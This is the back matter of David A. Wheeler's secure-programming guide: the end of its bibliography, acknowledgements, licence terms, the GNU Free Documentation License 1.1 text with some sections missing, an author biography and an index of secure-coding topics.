Communications of the ACM. v17 n7. pp. 388-402.
[Saltzer 1975] Saltzer, J., and M. Schroeder. September 1975. “The Protection of Information in
Computing Systems”. Proceedings of the IEEE. v63 n9. pp. 1278-1308.
http://www.mediacity.com/~norm/CapTheory/ProtInf. Summarized in [Pfleeger 1997, 286].
[Schneider 2000] Schneider, Fred B. 2000. "Open Source in Security: Visiting the Bizarre." Proceedings
of the 2000 IEEE Symposium on Security and Privacy (the “Oakland Conference”), May 14-17, 2000,
Berkeley, CA. Los Alamitos, CA: IEEE Computer Society. pp.126-127.
[Schneier 1996] Schneier, Bruce. 1996. Applied Cryptography, Second Edition: Protocols, Algorithms,
and Source Code in C. New York: John Wiley and Sons. ISBN 0-471-12845-7.
[Schneier 1998] Schneier, Bruce and Mudge. November 1998. Cryptanalysis of Microsoft’s
Point-to-Point Tunneling Protocol (PPTP) Proceedings of the 5th ACM Conference on Communications
and Computer Security, ACM Press. http://www.counterpane.com/pptp.html.
[Schneier 1999] Schneier, Bruce. September 15, 1999. “Open Source and Security”. Crypto-Gram.
Counterpane Internet Security, Inc. http://www.counterpane.com/crypto-gram-9909.html
[Seifried 1999] Seifried, Kurt. October 9, 1999. Linux Administrator’s Security Guide.
http://www.securityportal.com/lasg.
[Seifried 2001] Seifried, Kurt. September 2, 2001. WWW Authentication
http://www.seifried.org/security/www-auth/index.html.
[Shankland 2000] Shankland, Stephen. “Linux poses increasing threat to Windows 2000”. CNET.
http://news.cnet.com/news/0-1003-200-1549312.html
[Shostack 1999] Shostack, Adam. June 1, 1999. Security Code Review Guidelines.
http://www.homeport.org/~adam/review.html.
[Sibert 1996] Sibert, W. Olin. Malicious Data and Computer Security. (NIST) NISSC ’96.
http://www.fish.com/security/maldata.html
[Sitaker 1999] Sitaker, Kragen. Feb 26, 1999. How to Find Security Holes
http://www.pobox.com/~kragen/security-holes.html and
http://www.dnaco.net/~kragen/security-holes.html
[SSE-CMM 1999] SSE-CMM Project. April 1999. Systems Security Engineering Capability Maturity
Model (SSE CMM) Model Description Document. Version 2.0. http://www.sse-cmm.org
[Stallings 1996] Stallings, William. Practical Cryptography for Data Internetworks. Los Alamitos, CA:
IEEE Computer Society Press. ISBN 0-8186-7140-8.
[Stein 1999]. Stein, Lincoln D. September 13, 1999. The World Wide Web Security FAQ. Version 2.0.1
http://www.w3.org/Security/Faq/www-security-faq.html
[Swan 2001] Swan, Daniel. January 6, 2001. comp.os.linux.security FAQ. Version 1.0.
http://www.linuxsecurity.com/docs/colsfaq.html.
[Swanson 1996] Swanson, Marianne, and Barbara Guttman. September 1996. Generally Accepted
Principles and Practices for Securing Information Technology Systems. NIST Computer Security Special
Publication (SP) 800-14. http://csrc.nist.gov/publications/nistpubs/index.html.
[Thompson 1974] Thompson, K. and D.M. Ritchie. July 1974. “The UNIX Time-Sharing System”.
Communications of the ACM Vol. 17, No. 7. pp. 365-375.
[Torvalds 1999] Torvalds, Linus. February 1999. “The Story of the Linux Kernel”. Open Sources: Voices
from the Open Source Revolution. Edited by Chris Dibona, Mark Stone, and Sam Ockman. O’Reilly and
Associates. ISBN 1565925823. http://www.oreilly.com/catalog/opensources/book/linus.html
[TruSecure 2001] TruSecure. August 2001. Open Source Security: A Look at the Security Benefits of
Source Code Access. http://www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf
Appendix A. History
Here are a few key events in the development of this book, starting from most recent events:
Note that a more detailed description of changes is available on-line in the “ChangeLog” file.
Appendix B. Acknowledgements
As iron sharpens iron, so one man
sharpens another.
Proverbs 27:17 (NIV)
My thanks to the following people who kept me honest by sending me emails noting errors, suggesting
areas to cover, asking questions, and so on. Where email addresses are included, they’ve been shrouded
by prepending my “thanks.” so bulk emailers won’t easily get these addresses; inclusion of people in this
list is not an authorization to send unsolicited bulk email to them.
• Neil Brown ([email protected])
• Martin Douda ([email protected])
• Jorge Godoy
• Scott Ingram ([email protected])
• Michael Kerrisk
• Doug Kilpatrick
• John Levon ([email protected])
• Ryan McCabe ([email protected])
• Paul Millar ([email protected])
• Chuck Phillips ([email protected])
• Martin Pool ([email protected])
• Eric S. Raymond ([email protected])
• Marc Welz
• Eric Werme ([email protected])
Appendix C. About the Documentation License
A copy of the text of the edict was to be
issued as law in every province and
made known to the people of every
nationality so they would be ready for
that day.
Esther 3:14 (NIV)
This document is Copyright (C) 1999-2000 David A. Wheeler. Permission is granted to copy, distribute
and/or modify this document under the terms of the GNU Free Documentation License (FDL), Version
1.1 or any later version published by the Free Software Foundation; with the invariant sections being
“About the Author”, with no Front-Cover Texts, and no Back-Cover texts. A copy of the license is
included below in Appendix D.
These terms do permit mirroring by other web sites, but be sure to do the following:
• make sure your mirrors automatically get upgrades from the master site,
• clearly show the location of the master site (http://www.dwheeler.com/secure-programs), with a
hypertext link to the master site, and
• give me (David A. Wheeler) credit as the author.
The first two points primarily protect me from repeatedly hearing about obsolete bugs. I do not want to
hear about bugs I fixed a year ago, just because you are not properly mirroring the document. By linking
to the master site, users can check and see if your mirror is up-to-date. I’m sensitive to the problems of
sites which have very strong security requirements and therefore cannot risk normal connections to the
Internet; if that describes your situation, at least try to meet the other points and try to occasionally
sneakernet updates into your environment.
By this license, you may modify the document, but you can’t claim that what you didn’t write is yours
(i.e., plagiarism) nor can you pretend that a modified version is identical to the original work. Modifying
the work does not transfer copyright of the entire work to you; this is not a “public domain” work in
terms of copyright law. See the license in Appendix D for details. If you have questions about what the
license allows, please contact me. In most cases, it’s better if you send your changes to the master
integrator (currently David A. Wheeler), so that your changes will be integrated with everyone else’s
changes into the master copy.
I am not a lawyer; nevertheless, it’s my position as an author and software developer that any code
fragments not explicitly marked otherwise are so small that their use fits under the “fair use” doctrine in
copyright law. In other words, unless marked otherwise, you can use the code fragments without any
restriction at all. Copyright law does not permit copyrighting absurdly small components of a work (e.g.,
“I own all rights to B-flat and B-flat minor chords”), and the fragments not marked otherwise are of the
same kind of minuscule size when compared to real programs. I’ve done my best to give credit for
specific pieces of code written by others. Some of you may still be concerned about the legal status of
this code, and I want to make sure that it’s clear that you can use this code in your software. Therefore,
code fragments included directly in this document that are not otherwise marked have also been released
by me under the terms of the “MIT license”, to assure you that there’s no serious legal encumbrance:
Appendix D. GNU Free Documentation License
Version 1.1, March 2000
Copyright © 2000 Free Software Foundation, Inc.
Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is
not allowed.
0. PREAMBLE
The purpose of this License is to make a manual, textbook, or other written document "free" in the
sense of freedom: to assure everyone the effective freedom to copy and redistribute it, with or
without modifying it, either commercially or noncommercially. Secondarily, this License preserves
for the author and publisher a way to get credit for their work, while not being considered
responsible for modifications made by others.
This License is a kind of "copyleft", which means that derivative works of the document must
themselves be free in the same sense. It complements the GNU General Public License, which is a
copyleft license designed for free software.
We have designed this License in order to use it for manuals for free software, because free software
needs free documentation: a free program should come with manuals providing the same freedoms
that the software does. But this License is not limited to software manuals; it can be used for any
textual work, regardless of subject matter or whether it is published as a printed book. We
recommend this License principally for works whose purpose is instruction or reference.
The "Invariant Sections" are certain Secondary Sections whose titles are designated, as being those
of Invariant Sections, in the notice that says that the Document is released under this License.
The "Cover Texts" are certain short passages of text that are listed, as Front-Cover Texts or
Back-Cover Texts, in the notice that says that the Document is released under this License.
A "Transparent" copy of the Document means a machine-readable copy, represented in a format
whose specification is available to the general public, whose contents can be viewed and edited
directly and straightforwardly with generic text editors or (for images composed of pixels) generic
paint programs or (for drawings) some widely available drawing editor, and that is suitable for input
to text formatters or for automatic translation to a variety of formats suitable for input to text
formatters. A copy made in an otherwise Transparent file format whose markup has been designed
to thwart or discourage subsequent modification by readers is not Transparent. A copy that is not
"Transparent" is called "Opaque".
Examples of suitable formats for Transparent copies include plain ASCII without markup, Texinfo
input format, LaTeX input format, SGML or XML using a publicly available DTD, and
standard-conforming simple HTML designed for human modification. Opaque formats include
PostScript, PDF, proprietary formats that can be read and edited only by proprietary word
processors, SGML or XML for which the DTD and/or processing tools are not generally available,
and the machine-generated HTML produced by some word processors for output purposes only.
The "Title Page" means, for a printed book, the title page itself, plus such following pages as are
needed to hold, legibly, the material this License requires to appear in the title page. For works in
formats which do not have any title page as such, "Title Page" means the text near the most
prominent appearance of the work’s title, preceding the beginning of the body of the text.
2. VERBATIM COPYING
You may copy and distribute the Document in any medium, either commercially or
noncommercially, provided that this License, the copyright notices, and the license notice saying
this License applies to the Document are reproduced in all copies, and that you add no other
conditions whatsoever to those of this License. You may not use technical measures to obstruct or
control the reading or further copying of the copies you make or distribute. However, you may
accept compensation in exchange for copies. If you distribute a large enough number of copies you
must also follow the conditions in section 3.
You may also lend copies, under the same conditions stated above, and you may publicly display
copies.
3. COPYING IN QUANTITY
If you publish printed copies of the Document numbering more than 100, and the Document’s
license notice requires Cover Texts, you must enclose the copies in covers that carry, clearly and
legibly, all these Cover Texts: Front-Cover Texts on the front cover, and Back-Cover Texts on the
back cover. Both covers must also clearly and legibly identify you as the publisher of these copies.
The front cover must present the full title with all words of the title equally prominent and visible.
You may add other material on the covers in addition. Copying with changes limited to the covers,
as long as they preserve the title of the Document and satisfy these conditions, can be treated as
verbatim copying in other respects.
If the required texts for either cover are too voluminous to fit legibly, you should put the first ones
listed (as many as fit reasonably) on the actual cover, and continue the rest onto adjacent pages.
If you publish or distribute Opaque copies of the Document numbering more than 100, you must
either include a machine-readable Transparent copy along with each Opaque copy, or state in or
with each Opaque copy a publicly-accessible computer-network location containing a complete
Transparent copy of the Document, free of added material, which the general network-using public
has access to download anonymously at no charge using public-standard network protocols. If you
use the latter option, you must take reasonably prudent steps, when you begin distribution of
Opaque copies in quantity, to ensure that this Transparent copy will remain thus accessible at the
stated location until at least one year after the last time you distribute an Opaque copy (directly or
through your agents or retailers) of that edition to the public.
It is requested, but not required, that you contact the authors of the Document well before
redistributing any large number of copies, to give them a chance to provide you with an updated
version of the Document.
4. MODIFICATIONS
You may copy and distribute a Modified Version of the Document under the conditions of sections 2
and 3 above, provided that you release the Modified Version under precisely this License, with the
Modified Version filling the role of the Document, thus licensing distribution and modification of
the Modified Version to whoever possesses a copy of it. In addition, you must do these things in the
Modified Version:
A. Use in the Title Page (and on the covers, if any) a title distinct from that of the Document, and
from those of previous versions (which should, if there were any, be listed in the History
section of the Document). You may use the same title as a previous version if the original
publisher of that version gives permission.
B. List on the Title Page, as authors, one or more persons or entities responsible for authorship of
the modifications in the Modified Version, together with at least five of the principal authors of
the Document (all of its principal authors, if it has less than five).
C. State on the Title Page the name of the publisher of the Modified Version, as the publisher.
D. Preserve all the copyright notices of the Document.
E. Add an appropriate copyright notice for your modifications adjacent to the other copyright
notices.
F. Include, immediately after the copyright notices, a license notice giving the public permission
to use the Modified Version under the terms of this License, in the form shown in the
Addendum below.
G. Preserve in that license notice the full lists of Invariant Sections and required Cover Texts
given in the Document’s license notice.
H. Include an unaltered copy of this License.
I. Preserve the section entitled "History", and its title, and add to it an item stating at least the
title, year, new authors, and publisher of the Modified Version as given on the Title Page. If
there is no section entitled "History" in the Document, create one stating the title, year, authors,
and publisher of the Document as given on its Title Page, then add an item describing the
Modified Version as stated in the previous sentence.
J. Preserve the network location, if any, given in the Document for public access to a Transparent
copy of the Document, and likewise the network locations given in the Document for previous
versions it was based on. These may be placed in the "History" section. You may omit a
network location for a work that was published at least four years before the Document itself,
or if the original publisher of the version it refers to gives permission.
K. In any section entitled "Acknowledgements" or "Dedications", preserve the section’s title, and
preserve in the section all the substance and tone of each of the contributor acknowledgements
and/or dedications given therein.
L. Preserve all the Invariant Sections of the Document, unaltered in their text and in their titles.
Section numbers or the equivalent are not considered part of the section titles.
M. Delete any section entitled "Endorsements". Such a section may not be included in the
Modified Version.
N. Do not retitle any existing section as "Endorsements" or to conflict in title with any Invariant
Section.
If the Modified Version includes new front-matter sections or appendices that qualify as Secondary
Sections and contain no material copied from the Document, you may at your option designate
some or all of these sections as invariant. To do this, add their titles to the list of Invariant Sections
in the Modified Version’s license notice. These titles must be distinct from any other section titles.
You may add a section entitled "Endorsements", provided it contains nothing but endorsements of
your Modified Version by various parties--for example, statements of peer review or that the text
has been approved by an organization as the authoritative definition of a standard.
You may add a passage of up to five words as a Front-Cover Text, and a passage of up to 25 words
as a Back-Cover Text, to the end of the list of Cover Texts in the Modified Version. Only one
passage of Front-Cover Text and one of Back-Cover Text may be added by (or through
arrangements made by) any one entity. If the Document already includes a cover text for the same
cover, previously added by you or by arrangement made by the same entity you are acting on behalf
of, you may not add another; but you may replace the old one, on explicit permission from the
previous publisher that added the old one.
The author(s) and publisher(s) of the Document do not by this License give permission to use their
names for publicity for or to assert or imply endorsement of any Modified Version.
5. COMBINING DOCUMENTS
You may combine the Document with other documents released under this License, under the terms
defined in section 4 above for modified versions, provided that you include in the combination all of
the Invariant Sections of all of the original documents, unmodified, and list them all as Invariant
Sections of your combined work in its license notice.
The combined work need only contain one copy of this License, and multiple identical Invariant
Sections may be replaced with a single copy. If there are multiple Invariant Sections with the same
name but different contents, make the title of each such section unique by adding at the end of it, in
parentheses, the name of the original author or publisher of that section if known, or else a unique
number. Make the same adjustment to the section titles in the list of Invariant Sections in the license
notice of the combined work.
In the combination, you must combine any sections entitled "History" in the various original
documents, forming one section entitled "History"; likewise combine any sections entitled
"Acknowledgements", and any sections entitled "Dedications". You must delete all sections entitled
"Endorsements."
6. COLLECTIONS OF DOCUMENTS
You may make a collection consisting of the Document and other documents released under this
License, and replace the individual copies of this License in the various documents with a single
copy that is included in the collection, provided that you follow the rules of this License for
verbatim copying of each of the documents in all other respects.
You may extract a single document from such a collection, and distribute it individually under this
License, provided you insert a copy of this License into the extracted document, and follow this
License in all other respects regarding verbatim copying of that document.
8. TRANSLATION
Translation is considered a kind of modification, so you may distribute translations of the Document
under the terms of section 4. Replacing Invariant Sections with translations requires special
permission from their copyright holders, but you may include translations of some or all Invariant
Sections in addition to the original versions of these Invariant Sections. You may include a
translation of this License provided that you also include the original English version of this
License. In case of a disagreement between the translation and the original English version of this
License, the original English version will prevail.
9. TERMINATION
You may not copy, modify, sublicense, or distribute the Document except as expressly provided for
under this License. Any other attempt to copy, modify, sublicense or distribute the Document is
void, and will automatically terminate your rights under this License. However, parties who have
received copies, or rights, from you under this License will not have their licenses terminated so
long as such parties remain in full compliance.
version number of this License, you may choose any version ever published (not as a draft) by the
Free Software Foundation.
Addendum
To use this License in a document you have written, include a copy of the License in the document
and put the following copyright and license notices just after the title page:
Copyright © YEAR YOUR NAME.
Permission is granted to copy, distribute and/or modify this document under the terms of the GNU
Free Documentation License, Version 1.1 or any later version published by the Free Software
Foundation; with the Invariant Sections being LIST THEIR TITLES, with the Front-Cover Texts
being LIST, and with the Back-Cover Texts being LIST. A copy of the license is included in the
section entitled “GNU Free Documentation License”.
If you have no Invariant Sections, write "with no Invariant Sections" instead of saying which ones
are invariant. If you have no Front-Cover Texts, write "no Front-Cover Texts" instead of
"Front-Cover Texts being LIST"; likewise for Back-Cover Texts.
If your document contains nontrivial examples of program code, we recommend releasing these
examples in parallel under your choice of free software license, such as the GNU General Public
License, to permit their use in free software.
Appendix E. Endorsements
This version of the document is endorsed by the original author, David A. Wheeler, as a document that
should improve the security of programs, when applied correctly. Note that no book, including this one,
can guarantee that a developer who follows its guidelines will produce perfectly secure software.
Modifications (including translations) must remove this appendix per the license agreement included
above.
Appendix F. About the Author
Dr. David A. Wheeler is an expert in computer security and has long specialized in development
techniques for large and high-risk software systems. He has been involved in software development since
the mid-1970s, and with computer security since the early 1980s. His areas of knowledge include
computer security (including developing secure software) and open source software.
Dr. Wheeler is co-author and lead editor of the IEEE book Software Inspection: An Industry Best
Practice and author of the book Ada95: The Lovelace Tutorial. He is also the author of many smaller
papers and articles, including the Linux Program Library HOWTO.
Dr. Wheeler hopes that, by making this document available, other developers will make their software
more secure. You can reach him by email at [email protected] (no spam please), and you can also
see his web site at http://www.dwheeler.com.
Index
blacklist, 43
buffer bounds, 72
buffer overflow, 72
complete mediation, 84
design, 84
dynamically linked libraries (DLLs), 33
easy to use, 85
economy of mechanism, 84
fail-safe defaults, 85
format strings, 123
injection
shell, 115
SQL, 115
input validation, 43
least common mechanism, 85
least privilege, 84, 86
logical quotation, 20
metacharacters, 115
minimize feedback, 122
non-bypassability, 84
open design, 84
psychological acceptability, 85
salted hashes, 145
Saltzer and Schroeder, 84
separation of privilege, 85
shell injection, 115
simplicity, 84
SQL injection, 115
time of check - time of use, 95
TOCTOU, 95
UTF-8, 57
UTF-8 security issues, 58
whitelist, 43